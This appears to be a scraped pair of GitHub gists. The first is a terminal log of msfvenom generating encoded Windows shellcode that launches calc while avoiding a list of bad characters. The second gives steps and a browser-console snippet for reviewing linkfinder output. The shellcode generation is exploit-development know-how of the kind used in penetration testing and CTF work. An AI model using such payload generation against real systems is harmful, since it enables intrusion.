This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
❯ msfvenom -f python -p windows/exec cmd=calc exitfunc=seh --bad-chars '\x00\x20\x25\x26\x27\x2b\x2f\x5c\x7e' --smallest | |
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload | |
[-] No arch selected, selecting arch: x86 from the payload | |
Found 11 compatible encoders | |
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai | |
x86/shikata_ga_nai succeeded with size 216 (iteration=0) | |
Attempting to encode payload with 1 iterations of generic/none | |
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00) | |
Attempting to encode payload with 1 iterations of x86/call4_dword_xor | |
x86/call4_dword_xor succeeded with size 216 (iteration=0) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- run linkfinder | |
- open output.html | |
- open console in dev tools | |
- copy/paste line below | |
Array.prototype.forEach.call(document.getElementsByClassName('text'), function(el) { console.log(el.text); }); |